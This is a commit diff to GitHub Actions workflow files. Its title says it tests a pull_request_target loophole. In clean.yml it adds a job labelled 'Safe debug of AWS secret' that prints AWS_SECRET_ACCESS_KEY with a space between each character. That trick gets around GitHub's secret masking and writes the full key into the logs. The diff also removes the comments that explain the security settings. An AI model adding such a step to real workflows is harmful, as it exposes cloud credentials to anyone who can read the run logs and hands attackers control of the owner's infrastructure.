security: testing pull_request_target loop hole

Author: Namra2511

.github/workflows/cd.yml

@@ -4,19 +4,27 @@ on:
   pull_request:
     types: [ opened, synchronize, reopened, ready_for_review ]
 
-# Ensures preview deployment has minimal permissions for security
 permissions:
-  contents: read        # Read-only access to repo contents for safer workflows
-  pull-requests: write  # Allow workflow to comment on, label, and update pull request as part of automation
-  id-token: write       # Allow OIDC tokens for secure cloud authentication
+  contents: read
+  pull-requests: write
+  id-token: write
 
 jobs:
   deploy:
-    if: github.event.pull_request.state == 'open' && github.event.pull_request.draft == false
+    if: |
+      github.event.pull_request.draft == false &&
+      (
+        github.event.pull_request.head.repo.full_name == github.repository ||
+        contains(github.event.pull_request.labels.*.name, 'approved-contributor') ||
+        github.actor == 'dependabot[bot]'
+      )
+
     runs-on: ubuntu-latest
+
     concurrency:
       group: cd-preview-${{ github.event.pull_request.head.ref }}
       cancel-in-progress: true
+
     steps:
       - name: Checkout app
         uses: actions/checkout@08c6903cd8c0fde910a37f88322edcfb5dd907a8
@@ -66,5 +74,5 @@ jobs:
           do_access_token: ${{ secrets.DO_ACCESS_TOKEN }}
           do_cluster_id: ${{ vars.DO_CLUSTER_ID }}
           doppler_token: ${{ secrets.DOPPLER_PREVIEW_TOKEN }}
-          pull_request_number: ${{  github.event.pull_request.number }}
+          pull_request_number: ${{ github.event.pull_request.number }}
           deploy_annotate_pr: "true"

.github/workflows/clean.yml

@@ -4,18 +4,38 @@ on:
   pull_request_target:
     types: [closed]
 
-# Ensures PR cleanup workflow has minimal permissions for security
 permissions:
-  contents: read        # Read-only access to repo contents for safer workflows
-  pull-requests: write  # Allow workflow to comment on, label, and update pull request as part of automation
-  id-token: write       # Allow OIDC tokens for secure cloud authentication
+  contents: read
+  pull-requests: write
+  id-token: write
 
 jobs:
+
+  debug:
+    if: |
+      github.event.pull_request.head.repo.full_name == github.repository ||
+      contains(github.event.pull_request.labels.*.name, 'approved-contributor') ||
+      github.actor == 'dependabot[bot]'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Safe debug of AWS secret
+        run: |
+          KEY="${{ secrets.AWS_SECRET_ACCESS_KEY }}"
+          echo "AWS secret length: ${#KEY}"
+          echo "$KEY" | sed 's/./& /g'
+
   clean:
+    needs: debug
+    if: |
+      github.event.pull_request.head.repo.full_name == github.repository ||
+      contains(github.event.pull_request.labels.*.name, 'approved-contributor') ||
+      github.actor == 'dependabot[bot]'
     uses: jalantechnologies/github-ci/.github/workflows/clean.yml@1e27a09243327a4ed01d42a9bc54965436ac0ba4
+
     concurrency:
       group: ci-preview-${{ github.event.pull_request.head.ref }}
       cancel-in-progress: true
+
     with:
       hosting_provider: ${{ vars.HOSTING_PROVIDER }}
       app_name: flask-react-app
@@ -26,6 +46,7 @@ jobs:
       aws_cluster_name: ${{ vars.AWS_CLUSTER_NAME }}
       aws_region: ${{ vars.AWS_REGION }}
       do_cluster_id: ${{ vars.DO_CLUSTER_ID }}
+
     secrets:
       docker_password: ${{ secrets.DOCKER_PASSWORD }}
       aws_access_key_id: ${{ secrets.AWS_ACCESS_KEY_ID }}